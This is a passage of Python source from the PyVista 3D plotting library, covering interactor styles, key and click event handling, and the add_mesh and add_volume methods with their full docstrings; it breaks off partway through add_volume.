raise TypeError(f"Side ({side}) not supported. Try `left` or `right`")
def _click_callback(obj, event):
self.store_click_position()
if hasattr(callback, '__call__'):
if viewport:
callback(self.click_position)
else:
callback(self.pick_click_position())
self._add_observer(event, _click_callback)
def untrack_click_position(self):
"""Stop tracking the click position."""
if hasattr(self, "_click_observer"):
self.iren.RemoveObserver(self._click_observer)
del self._click_observer
def _prep_for_close(self):
"""Make sure a screenshot is acquired before closing.
This doesn't actually close anything! It just preps the plotter for
closing.
"""
# Grab screenshot right before renderer closes
self.last_image = self.screenshot(True, return_img=True)
self.last_image_depth = self.get_image_depth()
def increment_point_size_and_line_width(self, increment):
"""Increment point size and line width of all actors.
For every actor in the scene, increment both its point size and
line width by the given value.
"""
for renderer in self.renderers:
for actor in renderer._actors.values():
if hasattr(actor, "GetProperty"):
prop = actor.GetProperty()
if hasattr(prop, "SetPointSize"):
prop.SetPointSize(prop.GetPointSize() + increment)
if hasattr(prop, "SetLineWidth"):
prop.SetLineWidth(prop.GetLineWidth() + increment)
self.render()
return
def reset_key_events(self):
"""Reset all of the key press events to their defaults."""
self._key_press_event_callbacks = collections.defaultdict(list)
self.add_key_event('q', self._prep_for_close) # Add no matter what
b_left_down_callback = lambda: self._add_observer('LeftButtonPressEvent', self.left_button_down)
self.add_key_event('b', b_left_down_callback)
self.add_key_event('v', lambda: self.isometric_view_interactive())
self.add_key_event('f', self.fly_to_mouse_position)
self.add_key_event('C', lambda: self.enable_cell_picking())
self.add_key_event('Up', lambda: self.camera.Zoom(1.05))
self.add_key_event('Down', lambda: self.camera.Zoom(0.95))
self.add_key_event('plus', lambda: self.increment_point_size_and_line_width(1))
self.add_key_event('minus', lambda: self.increment_point_size_and_line_width(-1))
def key_press_event(self, obj, event):
"""Listen for key press event."""
key = self.iren.GetKeySym()
log.debug(f'Key {key} pressed')
self._last_key = key
if key in self._key_press_event_callbacks.keys():
# Note that defaultdict's will never throw a key error
callbacks = self._key_press_event_callbacks[key]
for func in callbacks:
func()
def left_button_down(self, obj, event_type):
"""Register the event for a left button down click."""
if hasattr(self.ren_win, 'GetOffScreenFramebuffer'):
if not self.ren_win.GetOffScreenFramebuffer().GetFBOIndex():
# must raise a runtime error as this causes a segfault on VTK9
raise ValueError('Invoking helper with no framebuffer')
# Get 2D click location on window
click_pos = self.iren.GetEventPosition()
# Get corresponding click location in the 3D plot
picker = vtk.vtkWorldPointPicker()
picker.Pick(click_pos[0], click_pos[1], 0, self.renderer)
self.pickpoint = np.asarray(picker.GetPickPosition()).reshape((-1, 3))
if np.any(np.isnan(self.pickpoint)):
self.pickpoint[:] = 0
def update_style(self):
"""Update the camera interactor style."""
if self._style_class is None:
# We need an actually custom style to handle button up events
self._style_class = _style_factory(self._style)(self)
if hasattr(self, 'iren'):
return self.iren.SetInteractorStyle(self._style_class)
def enable_trackball_style(self):
"""Set the interactive style to trackball camera.
The trackball camera is the default interactor style.
"""
self._style = 'TrackballCamera'
self._style_class = None
return self.update_style()
def enable_trackball_actor_style(self):
"""Set the interactive style to trackball actor.
This allows to rotate actors around the scene.
"""
self._style = 'TrackballActor'
self._style_class = None
return self.update_style()
def enable_image_style(self):
"""Set the interactive style to image.
Controls:
- Left Mouse button triggers window level events
- CTRL Left Mouse spins the camera around its view plane normal
- SHIFT Left Mouse pans the camera
- CTRL SHIFT Left Mouse dollys (a positional zoom) the camera
- Middle mouse button pans the camera
- Right mouse button dollys the camera.
- SHIFT Right Mouse triggers pick events
"""
self._style = 'Image'
self._style_class = None
return self.update_style()
def enable_joystick_style(self):
"""Set the interactive style to joystick.
It allows the user to move (rotate, pan, etc.) the camera, the point of
view for the scene. The position of the mouse relative to the center of
the scene determines the speed at which the camera moves, and the speed
of the mouse movement determines the acceleration of the camera, so the
camera continues to move even if the mouse if not moving.
For a 3-button mouse, the left button is for rotation, the right button
for zooming, the middle button for panning, and ctrl + left button for
spinning. (With fewer mouse buttons, ctrl + shift + left button is
for zooming, and shift + left button is for panning.)
"""
self._style = 'JoystickCamera'
self._style_class = None
return self.update_style()
def enable_zoom_style(self):
"""Set the interactive style to rubber band zoom.
This interactor style allows the user to draw a rectangle in the render
window using the left mouse button. When the mouse button is released,
the current camera zooms by an amount determined from the shorter side
of the drawn rectangle.
"""
self._style = 'RubberBandZoom'
self._style_class = None
return self.update_style()
def enable_terrain_style(self):
"""Set the interactive style to terrain.
Used to manipulate a camera which is viewing a scene with a natural
view up, e.g., terrain. The camera in such a scene is manipulated by
specifying azimuth (angle around the view up vector) and elevation
(the angle from the horizon).
"""
self._style = 'Terrain'
self._style_class = None
return self.update_style()
def enable_rubber_band_style(self):
"""Set the interactive style to rubber band picking.
This interactor style allows the user to draw a rectangle in the render
window by hitting 'r' and then using the left mouse button.
When the mouse button is released, the attached picker operates on the
pixel in the center of the selection rectangle. If the picker happens to
be a vtkAreaPicker it will operate on the entire selection rectangle.
When the 'p' key is hit the above pick operation occurs on a 1x1
rectangle. In other respects it behaves the same as its parent class.
"""
self._style = 'RubberBandPick'
self._style_class = None
return self.update_style()
def enable_rubber_band_2d_style(self):
"""Set the interactive style to rubber band 2d.
Camera rotation is not allowed with this interactor style. Zooming
affects the camera's parallel scale only, and assumes that the camera
is in parallel projection mode. The style also allows draws a rubber
band using the left button. All camera changes invoke
StartInteractionEvent when the button is pressed, InteractionEvent
when the mouse (or wheel) is moved, and EndInteractionEvent when the
button is released. The bindings are as follows: Left mouse - Select
(invokes a SelectionChangedEvent). Right mouse - Zoom.
Middle mouse - Pan. Scroll wheel - Zoom.
"""
self._style = 'RubberBand2D'
self._style_class = None
return self.update_style()
def hide_axes_all(self):
"""Hide the axes orientation widget in all renderers."""
for renderer in self.renderers:
renderer.hide_axes()
return
def show_axes_all(self):
"""Show the axes orientation widget in all renderers."""
for renderer in self.renderers:
renderer.show_axes()
return
def isometric_view_interactive(self):
"""Set the current interactive render window to isometric view."""
interactor = self.iren.GetInteractorStyle()
renderer = interactor.GetCurrentRenderer()
if renderer is None:
renderer = self.renderer
renderer.view_isometric()
def update(self, stime=1, force_redraw=True):
"""Update window, redraw, process messages query.
Parameters
----------
stime : int, optional
Duration of timer that interrupt vtkRenderWindowInteractor in
milliseconds.
force_redraw : bool, optional
Call ``render`` immediately.
"""
if stime <= 0:
stime = 1
curr_time = time.time()
if Plotter.last_update_time > curr_time:
Plotter.last_update_time = curr_time
if not hasattr(self, 'iren'):
return
update_rate = self.iren.GetDesiredUpdateRate()
if (curr_time - Plotter.last_update_time) > (1.0/update_rate):
self.right_timer_id = self.iren.CreateRepeatingTimer(stime)
self.iren.Start()
self.iren.DestroyTimer(self.right_timer_id)
self.render()
Plotter.last_update_time = curr_time
elif force_redraw:
self.render()
def add_mesh(self, mesh, color=None, style=None, scalars=None,
clim=None, show_edges=None, edge_color=None,
point_size=5.0, line_width=None, opacity=1.0,
flip_scalars=False, lighting=None, n_colors=256,
interpolate_before_map=True, cmap=None, label=None,
reset_camera=None, scalar_bar_args=None, show_scalar_bar=None,
stitle=None, multi_colors=False, name=None, texture=None,
render_points_as_spheres=None, render_lines_as_tubes=False,
smooth_shading=False, ambient=0.0, diffuse=1.0, specular=0.0,
specular_power=100.0, nan_color=None, nan_opacity=1.0,
culling=None, rgb=False, categories=False,
use_transparency=False, below_color=None, above_color=None,
annotations=None, pickable=True, preference="point",
log_scale=False, render=True, **kwargs):
"""Add any PyVista/VTK mesh or dataset that PyVista can wrap to the scene.
This method is using a mesh representation to view the surfaces
and/or geometry of datasets. For volume rendering, see
:func:`pyvista.BasePlotter.add_volume`.
Parameters
----------
mesh : pyvista.Common or pyvista.MultiBlock
Any PyVista or VTK mesh is supported. Also, any dataset
that :func:`pyvista.wrap` can handle including NumPy arrays of XYZ
points.
color : string or 3 item list, optional, defaults to white
Use to make the entire mesh have a single solid color.
Either a string, RGB list, or hex color string. For example:
``color='white'``, ``color='w'``, ``color=[1, 1, 1]``, or
``color='#FFFFFF'``. Color will be overridden if scalars are
specified.
style : string, optional
Visualization style of the mesh. One of the following:
``style='surface'``, ``style='wireframe'``, ``style='points'``.
Defaults to ``'surface'``. Note that ``'wireframe'`` only shows a
wireframe of the outer geometry.
scalars : str or numpy.ndarray, optional
Scalars used to "color" the mesh. Accepts a string name of an
array that is present on the mesh or an array equal
to the number of cells or the number of points in the
mesh. Array should be sized as a single vector. If both
``color`` and ``scalars`` are ``None``, then the active scalars are
used.
clim : 2 item list, optional
Color bar range for scalars. Defaults to minimum and
maximum of scalars array. Example: ``[-1, 2]``. ``rng``
is also an accepted alias for this.
show_edges : bool, optional
Shows the edges of a mesh. Does not apply to a wireframe
representation.
edge_color : string or 3 item list, optional, defaults to black
The solid color to give the edges when ``show_edges=True``.
Either a string, RGB list, or hex color string.
point_size : float, optional
Point size of any nodes in the dataset plotted. Also applicable
when style='points'. Default ``5.0``
line_width : float, optional
Thickness of lines. Only valid for wireframe and surface
representations. Default None.
opacity : float, str, array-like
Opacity of the mesh. If a single float value is given, it will be
the global opacity of the mesh and uniformly applied everywhere -
should be between 0 and 1. A string can also be specified to map
the scalars range to a predefined opacity transfer function
(options include: 'linear', 'linear_r', 'geom', 'geom_r').
A string could also be used to map a scalars array from the mesh to
the opacity (must have same number of elements as the
``scalars`` argument). Or you can pass a custom made transfer
function that is an array either ``n_colors`` in length or shorter.
flip_scalars : bool, optional
Flip direction of cmap. Most colormaps allow ``*_r`` suffix to do
this as well.
lighting : bool, optional
Enable or disable view direction lighting. Default False.
n_colors : int, optional
Number of colors to use when displaying scalars. Defaults to 256.
The scalar bar will also have this many colors.
interpolate_before_map : bool, optional
Enabling makes for a smoother scalars display. Default is True.
When False, OpenGL will interpolate the mapped colors which can
result is showing colors that are not present in the color map.
cmap : str, list, optional
Name of the Matplotlib colormap to us when mapping the ``scalars``.
See available Matplotlib colormaps. Only applicable for when
displaying ``scalars``. Requires Matplotlib to be installed.
``colormap`` is also an accepted alias for this. If ``colorcet`` or
``cmocean`` are installed, their colormaps can be specified by name.
You can also specify a list of colors to override an
existing colormap with a custom one. For example, to
create a three color colormap you might specify
``['green', 'red', 'blue']``
label : str, optional
String label to use when adding a legend to the scene with
:func:`pyvista.BasePlotter.add_legend`
reset_camera : bool, optional
Reset the camera after adding this mesh to the scene
scalar_bar_args : dict, optional
Dictionary of keyword arguments to pass when adding the scalar bar
to the scene. For options, see
:func:`pyvista.BasePlotter.add_scalar_bar`.
show_scalar_bar : bool
If False, a scalar bar will not be added to the scene. Defaults
to ``True``.
stitle : string, optional
Scalar bar title. By default the scalar bar is given a title of the
the scalars array used to color the mesh.
To create a bar with no title, use an empty string (i.e. '').
multi_colors : bool, optional
If a ``MultiBlock`` dataset is given this will color each
block by a solid color using matplotlib's color cycler.
name : str, optional
The name for the added mesh/actor so that it can be easily
updated. If an actor of this name already exists in the
rendering window, it will be replaced by the new actor.
texture : vtk.vtkTexture or np.ndarray or boolean, optional
A texture to apply if the input mesh has texture
coordinates. This will not work with MultiBlock
datasets. If set to ``True``, the first available texture
on the object will be used. If a string name is given, it
will pull a texture with that name associated to the input
mesh.
render_points_as_spheres : bool, optional
render_lines_as_tubes : bool, optional
smooth_shading : bool, optional
ambient : float, optional
When lighting is enabled, this is the amount of light from
0 to 1 that reaches the actor when not directed at the
light source emitted from the viewer. Default 0.0
diffuse : float, optional
The diffuse lighting coefficient. Default 1.0
specular : float, optional
The specular lighting coefficient. Default 0.0
specular_power : float, optional
The specular power. Between 0.0 and 128.0
nan_color : string or 3 item list, optional, defaults to gray
The color to use for all ``NaN`` values in the plotted scalar
array.
nan_opacity : float, optional
Opacity of ``NaN`` values. Should be between 0 and 1.
Default 1.0
culling : str, optional
Does not render faces that are culled. Options are ``'front'`` or
``'back'``. This can be helpful for dense surface meshes,
especially when edges are visible, but can cause flat
meshes to be partially displayed. Defaults ``False``.
rgb : bool, optional
If an 2 dimensional array is passed as the scalars, plot those
values as RGB(A) colors! ``rgba`` is also accepted alias for this.
Opacity (the A) is optional.
categories : bool, optional
If set to ``True``, then the number of unique values in the scalar
array will be used as the ``n_colors`` argument.
use_transparency : bool, optional
Invert the opacity mappings and make the values correspond to
transparency.
below_color : string or 3 item list, optional
Solid color for values below the scalars range (``clim``). This
will automatically set the scalar bar ``below_label`` to
``'Below'``
above_color : string or 3 item list, optional
Solid color for values below the scalars range (``clim``). This
will automatically set the scalar bar ``above_label`` to
``'Above'``
annotations : dict, optional
Pass a dictionary of annotations. Keys are the float values in the
scalars range to annotate on the scalar bar and the values are the
the string annotations.
pickable : bool
Set whether this mesh is pickable
Return
------
actor: vtk.vtkActor
VTK actor of the mesh.
"""
# Convert the VTK data object to a pyvista wrapped object if necessary
if not is_pyvista_dataset(mesh):
mesh = wrap(mesh)
if not is_pyvista_dataset(mesh):
raise TypeError(f'Object type ({type(mesh)}) not supported for plotting in PyVista.')
##### Parse arguments to be used for all meshes #####
if scalar_bar_args is None:
scalar_bar_args = {}
if show_edges is None:
show_edges = rcParams['show_edges']
if edge_color is None:
edge_color = rcParams['edge_color']
if show_scalar_bar is None:
show_scalar_bar = rcParams['show_scalar_bar']
if lighting is None:
lighting = rcParams['lighting']
# supported aliases
clim = kwargs.pop('rng', clim)
cmap = kwargs.pop('colormap', cmap)
culling = kwargs.pop("backface_culling", culling)
if render_points_as_spheres is None:
render_points_as_spheres = rcParams['render_points_as_spheres']
if name is None:
name = f'{type(mesh).__name__}({mesh.memory_address})'
if nan_color is None:
nan_color = rcParams['nan_color']
nan_color = list(parse_color(nan_color))
nan_color.append(nan_opacity)
if color is True:
color = rcParams['color']
if texture is False:
texture = None
if culling is True:
culling = 'backface'
rgb = kwargs.pop('rgba', rgb)
if "scalar" in kwargs:
raise TypeError("`scalar` is an invalid keyword argument for `add_mesh`. Perhaps you mean `scalars` with an s?")
assert_empty_kwargs(**kwargs)
##### Handle composite datasets #####
if isinstance(mesh, pyvista.MultiBlock):
# first check the scalars
if clim is None and scalars is not None:
# Get the data range across the array for all blocks
# if scalars specified
if isinstance(scalars, str):
clim = mesh.get_data_range(scalars)
else:
# TODO: an array was given... how do we deal with
# that? Possibly a 2D arrays or list of
# arrays where first index corresponds to
# the block? This could get complicated real
# quick.
raise TypeError('scalars array must be given as a string name for multiblock datasets.')
the_arguments = locals()
the_arguments.pop('self')
the_arguments.pop('mesh')
the_arguments.pop('kwargs')
if multi_colors:
# Compute unique colors for each index of the block
if has_matplotlib:
from itertools import cycle
cycler = matplotlib.rcParams['axes.prop_cycle']
colors = cycle(cycler)
else:
multi_colors = False
logging.warning('Please install matplotlib for color cycles')
# Now iteratively plot each element of the multiblock dataset
actors = []
for idx in range(mesh.GetNumberOfBlocks()):
if mesh[idx] is None:
continue
# Get a good name to use
next_name = f'{name}-{idx}'
# Get the data object
if not is_pyvista_dataset(mesh[idx]):
data = wrap(mesh.GetBlock(idx))
if not is_pyvista_dataset(mesh[idx]):
continue # move on if we can't plot it
else:
data = mesh.GetBlock(idx)
if data is None or (not isinstance(data, pyvista.MultiBlock) and data.n_points < 1):
# Note that a block can exist but be None type
# or it could have zeros points (be empty) after filtering
continue
# Now check that scalars is available for this dataset
if isinstance(data, vtk.vtkMultiBlockDataSet) or get_array(data, scalars) is None:
ts = None
else:
ts = scalars
if multi_colors:
color = next(colors)['color']
## Add to the scene
the_arguments['color'] = color
the_arguments['scalars'] = ts
the_arguments['name'] = next_name
the_arguments['texture'] = None
a = self.add_mesh(data, **the_arguments)
actors.append(a)
if (reset_camera is None and not self.camera_set) or reset_camera:
cpos = self.get_default_cam_pos()
self.camera_position = cpos
self.camera_set = False
self.reset_camera()
return actors
##### Plot a single PyVista mesh #####
# Compute surface normals if using smooth shading
if smooth_shading:
# extract surface if mesh is exterior
if not isinstance(mesh, pyvista.PolyData):
grid = mesh
mesh = grid.extract_surface()
ind = mesh.point_arrays['vtkOriginalPointIds']
# remap scalars
if isinstance(scalars, np.ndarray):
scalars = scalars[ind]
if texture:
_tcoords = mesh.t_coords
mesh.compute_normals(cell_normals=False, inplace=True)
if texture:
mesh.t_coords = _tcoords
if mesh.n_points < 1:
raise ValueError('Empty meshes cannot be plotted. Input mesh has zero points.')
# Try to plot something if no preference given
if scalars is None and color is None and texture is None:
# Prefer texture first
if len(list(mesh.textures.keys())) > 0:
texture = True
# If no texture, plot any active scalar
else:
# Make sure scalars components are not vectors/tuples
scalars = mesh.active_scalars_name
# Don't allow plotting of string arrays by default
if scalars is not None:# and np.issubdtype(mesh.active_scalars.dtype, np.number):
if stitle is None:
stitle = scalars
else:
scalars = None
# set main values
self.mesh = mesh
self.mapper = make_mapper(vtk.vtkDataSetMapper)
self.mapper.SetInputData(self.mesh)
self.mapper.GetLookupTable().SetNumberOfTableValues(n_colors)
if interpolate_before_map:
self.mapper.InterpolateScalarsBeforeMappingOn()
actor = vtk.vtkActor()
prop = vtk.vtkProperty()
actor.SetMapper(self.mapper)
actor.SetProperty(prop)
# Make sure scalars is a numpy array after this point
original_scalar_name = None
if isinstance(scalars, str):
self.mapper.SetArrayName(scalars)
original_scalar_name = scalars
scalars = get_array(mesh, scalars,
preference=preference, err=True)
if stitle is None:
stitle = original_scalar_name
if texture is True or isinstance(texture, (str, int)):
texture = mesh._activate_texture(texture)
if texture:
if isinstance(texture, np.ndarray):
texture = numpy_to_texture(texture)
if not isinstance(texture, (vtk.vtkTexture, vtk.vtkOpenGLTexture)):
raise TypeError(f'Invalid texture type ({type(texture)})')
if mesh.GetPointData().GetTCoords() is None:
raise ValueError('Input mesh does not have texture coordinates to support the texture.')
actor.SetTexture(texture)
# Set color to white by default when using a texture
if color is None:
color = 'white'
if scalars is None:
show_scalar_bar = False
self.mapper.SetScalarModeToUsePointFieldData()
# Handle making opacity array =========================================
_custom_opac = False
if isinstance(opacity, str):
try:
# Get array from mesh
opacity = get_array(mesh, opacity,
preference=preference, err=True)
if np.any(opacity > 1):
warnings.warn("Opacity scalars contain values over 1")
if np.any(opacity < 0):
warnings.warn("Opacity scalars contain values less than 0")
_custom_opac = True
except:
# Or get opacity transfer function
opacity = opacity_transfer_function(opacity, n_colors)
else:
if scalars.shape[0] != opacity.shape[0]:
raise ValueError('Opacity array and scalars array must have the same number of elements.')
elif isinstance(opacity, (np.ndarray, list, tuple)):
opacity = np.array(opacity)
if scalars.shape[0] == opacity.shape[0]:
# User could pass an array of opacities for every point/cell
_custom_opac = True
else:
opacity = opacity_transfer_function(opacity, n_colors)
if use_transparency and np.max(opacity) <= 1.0:
opacity = 1 - opacity
elif use_transparency and isinstance(opacity, np.ndarray):
opacity = 255 - opacity
# Scalars formatting ==================================================
if cmap is None: # Set default map if matplotlib is available
if has_matplotlib:
cmap = rcParams['cmap']
# Set the array title for when it is added back to the mesh
if _custom_opac:
title = '__custom_rgba'
elif stitle is None:
title = 'Data'
else:
title = stitle
if scalars is not None:
# if scalars is a string, then get the first array found with that name
if not isinstance(scalars, np.ndarray):
scalars = np.asarray(scalars)
_using_labels = False
if not np.issubdtype(scalars.dtype, np.number):
# raise TypeError('Non-numeric scalars are currently not supported for plotting.')
# TODO: If str array, digitive and annotate
cats, scalars = np.unique(scalars.astype('|S'), return_inverse=True)
values = np.unique(scalars)
clim = [np.min(values) - 0.5, np.max(values) + 0.5]
title = f'{title}-digitized'
n_colors = len(cats)
scalar_bar_args.setdefault('n_labels', 0)
_using_labels = True
if rgb:
if scalars.ndim != 2 or scalars.shape[1] < 3 or scalars.shape[1] > 4:
raise ValueError('RGB array must be n_points/n_cells by 3/4 in shape.')
if scalars.ndim != 1:
if rgb:
pass
elif scalars.ndim == 2 and (scalars.shape[0] == mesh.n_points or scalars.shape[0] == mesh.n_cells):
scalars = np.linalg.norm(scalars.copy(), axis=1)
title = f'{title}-normed'
else:
scalars = scalars.ravel()
if scalars.dtype == np.bool_:
scalars = scalars.astype(np.float_)
def prepare_mapper(scalars):
# Scalars interpolation approach
if scalars.shape[0] == mesh.n_points:
self.mesh._add_point_array(scalars, title, True)
self.mapper.SetScalarModeToUsePointData()
elif scalars.shape[0] == mesh.n_cells:
self.mesh._add_cell_array(scalars, title, True)
self.mapper.SetScalarModeToUseCellData()
else:
raise_not_matching(scalars, mesh)
# Common tasks
self.mapper.GetLookupTable().SetNumberOfTableValues(n_colors)
if interpolate_before_map:
self.mapper.InterpolateScalarsBeforeMappingOn()
if rgb or _custom_opac:
self.mapper.SetColorModeToDirectScalars()
else:
self.mapper.SetColorModeToMapScalars()
return
prepare_mapper(scalars)
table = self.mapper.GetLookupTable()
if log_scale:
table.SetScaleToLog10()
if _using_labels:
table.SetAnnotations(convert_array(values), convert_string_array(cats))
if isinstance(annotations, dict):
for val, anno in annotations.items():
table.SetAnnotation(float(val), str(anno))
# Set scalars range
if clim is None:
clim = [np.nanmin(scalars), np.nanmax(scalars)]
elif isinstance(clim, float) or isinstance(clim, int):
clim = [-clim, clim]
if np.any(clim) and not rgb:
self.mapper.scalar_range = clim[0], clim[1]
table.SetNanColor(nan_color)
if above_color:
table.SetUseAboveRangeColor(True)
table.SetAboveRangeColor(*parse_color(above_color, opacity=1))
scalar_bar_args.setdefault('above_label', 'Above')
if below_color:
table.SetUseBelowRangeColor(True)
table.SetBelowRangeColor(*parse_color(below_color, opacity=1))
scalar_bar_args.setdefault('below_label', 'Below')
if cmap is not None:
if not has_matplotlib:
cmap = None
logging.warning('Please install matplotlib for color maps.')
cmap = get_cmap_safe(cmap)
if categories:
if categories is True:
n_colors = len(np.unique(scalars))
elif isinstance(categories, int):
n_colors = categories
ctable = cmap(np.linspace(0, 1, n_colors))*255
ctable = ctable.astype(np.uint8)
# Set opactities
if isinstance(opacity, np.ndarray) and not _custom_opac:
ctable[:,-1] = opacity
if flip_scalars:
ctable = np.ascontiguousarray(ctable[::-1])
table.SetTable(VN.numpy_to_vtk(ctable))
if _custom_opac:
# need to round the colors here since we're
# directly displaying the colors
hue = normalize(scalars, minimum=clim[0], maximum=clim[1])
scalars = np.round(hue*n_colors)/n_colors
scalars = cmap(scalars)*255
scalars[:, -1] *= opacity
scalars = scalars.astype(np.uint8)
prepare_mapper(scalars)
else: # no cmap specified
if flip_scalars:
table.SetHueRange(0.0, 0.66667)
else:
table.SetHueRange(0.66667, 0.0)
else:
self.mapper.SetScalarModeToUseFieldData()
# Set actor properties ================================================
# select view style
if not style:
style = 'surface'
style = style.lower()
if style == 'wireframe':
prop.SetRepresentationToWireframe()
if color is None:
color = rcParams['outline_color']
elif style == 'points':
prop.SetRepresentationToPoints()
elif style == 'surface':
prop.SetRepresentationToSurface()
else:
raise ValueError('Invalid style. Must be one of the following:\n'
'\t"surface"\n'
'\t"wireframe"\n'
'\t"points"\n')
prop.SetPointSize(point_size)
prop.SetAmbient(ambient)
prop.SetDiffuse(diffuse)
prop.SetSpecular(specular)
prop.SetSpecularPower(specular_power)
if smooth_shading:
prop.SetInterpolationToPhong()
else:
prop.SetInterpolationToFlat()
# edge display style
if show_edges:
prop.EdgeVisibilityOn()
rgb_color = parse_color(color)
prop.SetColor(rgb_color)
if isinstance(opacity, (float, int)):
prop.SetOpacity(opacity)
prop.SetEdgeColor(parse_color(edge_color))
if render_points_as_spheres:
prop.SetRenderPointsAsSpheres(render_points_as_spheres)
if render_lines_as_tubes:
prop.SetRenderLinesAsTubes(render_lines_as_tubes)
# legend label
if label:
if not isinstance(label, str):
raise TypeError('Label must be a string')
geom = pyvista.single_triangle()
if scalars is not None:
geom = pyvista.Box()
rgb_color = parse_color('black')
geom.points -= geom.center
self._labels.append([geom, label, rgb_color])
# lighting display style
if not lighting:
prop.LightingOff()
# set line thickness
if line_width:
prop.SetLineWidth(line_width)
# Add scalar bar if available
if stitle is not None and show_scalar_bar and (not rgb or _custom_opac):
self.add_scalar_bar(stitle, **scalar_bar_args)
self.add_actor(actor,
reset_camera=reset_camera,
name=name, culling=culling,
pickable=pickable,
render=render)
self.renderer.Modified()
return actor
def add_volume(self, volume, scalars=None, clim=None, resolution=None,
opacity='linear', n_colors=256, cmap=None, flip_scalars=False,
reset_camera=None, name=None, ambient=0.0, categories=False,
culling=False, multi_colors=False,
blending='composite', mapper=None,
stitle=None, scalar_bar_args=None, show_scalar_bar=None,
annotations=None, pickable=True, preference="point",
opacity_unit_distance=None, shade=False,
diffuse=0.7, specular=0.2, specular_power=10.0, **kwargs):
"""Add a volume, rendered using a smart mapper by default.
Requires a 3D :class:`numpy.ndarray` or :class:`pyvista.UniformGrid`.
Parameters
----------
volume : 3D numpy.ndarray or pyvista.UniformGrid
The input volume to visualize. 3D numpy arrays are accepted.
scalars : str or numpy.ndarray, optional
Scalars used to "color" the mesh. Accepts a string name of an
array that is present on the mesh or an array equal
to the number of cells or the number of points in the
mesh. Array should be sized as a single vector. If ``scalars`` is
``None``, then the active scalars are used.
clim : 2 item list, optional
Color bar range for scalars. Defaults to minimum and
maximum of scalars array. Example: ``[-1, 2]``. ``rng``
is also an accepted alias for this.
opacity : string or numpy.ndarray, optional
Opacity mapping for the scalars array.
A string can also be specified to map the scalars range to a
predefined opacity transfer function (options include: 'linear',
'linear_r', 'geom', 'geom_r'). Or you can pass a custom made
transfer function that is an array either ``n_colors`` in length or
shorter.
n_colors : int, optional
Number of colors to use when displaying scalars. Defaults to 256.
The scalar bar will also have this many colors.
cmap : str, optional
Name of the Matplotlib colormap to us when mapping the ``scalars``.
See available Matplotlib colormaps. Only applicable for when
displaying ``scalars``. Requires Matplotlib to be installed.
``colormap`` is also an accepted alias for this. If ``colorcet`` or
``cmocean`` are installed, their colormaps can be specified by name.
flip_scalars : bool, optional
Flip direction of cmap. Most colormaps allow ``*_r`` suffix to do
this as well.
reset_camera : bool, optional
Reset the camera after adding this mesh to the scene
name : str, optional
The name for the added actor so that it can be easily
updated. If an actor of this name already exists in the
rendering window, it will be replaced by the new actor.
ambient : float, optional
When lighting is enabled, this is the amount of light from
0 to 1 that reaches the actor when not directed at the
light source emitted from the viewer. Default 0.0.
culling : str, optional
Does not render faces that are culled. Options are ``'front'`` or
``'back'``. This can be helpful for dense surface meshes,
especially when edges are visible, but can cause flat
meshes to be partially displayed. Defaults ``False``.
categories : bool, optional
If set to ``True``, then the number of unique values in the scalar
array will be used as the ``n_colors`` argument.
multi_colors : bool, optional
Whether or not to use multiple colors when plotting MultiBlock
object. Blocks will be colored sequentially as 'Reds', 'Greens',
'Blues', and 'Grays'.
blending : str, optional
Blending mode for visualisation of the input object(s). Can be
one of 'additive', 'maximum', 'minimum', 'composite', or
'average'. Defaults to 'additive'.
mapper : str, optional
Volume mapper to use given by name. Options include:
``'fixed_point'``, ``'gpu'``, ``'open_gl'``, and ``'smart'``.
If ``None`` the ``"volume_mapper"`` in the ``rcParams`` is used.
scalar_bar_args : dict, optional
Dictionary of keyword arguments to pass when adding the scalar bar
to the scene. For options, see
:func:`pyvista.BasePlotter.add_scalar_bar`.
show_scalar_bar : bool
If False, a scalar bar will not be added to the scene. Defaults
to ``True``.
stitle : string, optional
Scalar bar title. By default the scalar bar is given a title of the
the scalars array used to color the mesh.
To create a bar with no title, use an empty string (i.e. '').
annotations : dict, optional
Pass a dictionary of annotations. Keys are the float values in the
scalars range to annotate on the scalar bar and the values are the
the string annotations.
opacity_unit_distance : float
Set/Get the unit distance on which the scalar opacity transfer
function is defined. Meaning that over that distance, a given
opacity (from the transfer function) is accumulated. This is
adjusted for the actual sampling distance during rendering. By
default, this is the length of the diagonal of the bounding box of
the volume divided by the dimensions.
shade : bool
Default off. If shading is turned on, the mapper may perform
shading calculations - in some cases shading does not apply
(for example, in a maximum intensity projection) and therefore
shading will not be performed even if this flag is on.
diffuse : float, optional
The diffuse lighting coefficient. Default 1.0
specular : float, optional
The specular lighting coefficient. Default 0.0
specular_power : float, optional
The specular power. Between 0.0 and 128.0
Return
------
actor: vtk.vtkVolume
VTK volume of the input data.
"""
# Handle default arguments
# Supported aliases
clim = kwargs.pop('rng', clim)
cmap = kwargs.pop('colormap', cmap)
culling = kwargs.pop("backface_culling", culling)
if "scalar" in kwargs:
raise TypeError("`scalar` is an invalid keyword argument for `add_mesh`. Perhaps you mean `scalars` with an s?")
assert_empty_kwargs(**kwargs)
if scalar_bar_args is None:
scalar_bar_args = {}
if show_scalar_bar is None:
show_scalar_bar = rcParams['show_scalar_bar']
if culling is True:
culling = 'backface'
if mapper is None:
mapper = rcParams["volume_mapper"]
# Convert the VTK data object to a pyvista wrapped object if necessary
if not is_pyvista_dataset(volume):
if isinstance(volume, np.ndarray):
volume = wrap(volume)
if resolution is None:
resolution = [1,1,1]
elif len(resolution) != 3:
raise ValueError('Invalid resolution dimensions.')
volume.spacing = resolution
else:
volume = wrap(volume)
if not is_pyvista_dataset(volume):
raise TypeError(f'Object type ({type(volume)}) not supported for plotting in PyVista.')
else:
# HACK: Make a copy so the original object is not altered.
# Also, place all data on the nodes as issues arise when
# volume rendering on the cells.
volume = volume.cell_data_to_point_data()
if name is None:
name = f'{type(volume).__name__}({volume.memory_address})'
if isinstance(volume, pyvista.MultiBlock):
from itertools import cycle
cycler = cycle(['Reds', 'Greens', 'Blues', 'Greys', 'Oranges', 'Purples'])
# Now iteratively plot each element of the multiblock dataset
actors = []
for idx in range(volume.GetNumberOfBlocks()):
if volume[idx] is None:
continue
# Get a good name to use
next_name = f'{name}-{idx}'
# Get the data object
block = wrap(volume.GetBlock(idx))
if resolution is None:
try:
block_resolution = block.GetSpacing()
except AttributeError:
block_resolution = resolution
else:
block_resolution = resolution
if multi_colors:
color = next(cycler)
else:
color = cmap
a = self.add_volume(block, resolution=block_resolution, opacity=opacity,
n_colors=n_colors, cmap=color, flip_scalars=flip_scalars,
reset_camera=reset_camera, name=next_name,
ambient=ambient, categories=categories,
culling=culling, clim=clim,
mapper=mapper, pickable=pickable,
opacity_unit_distance=opacity_unit_distance,
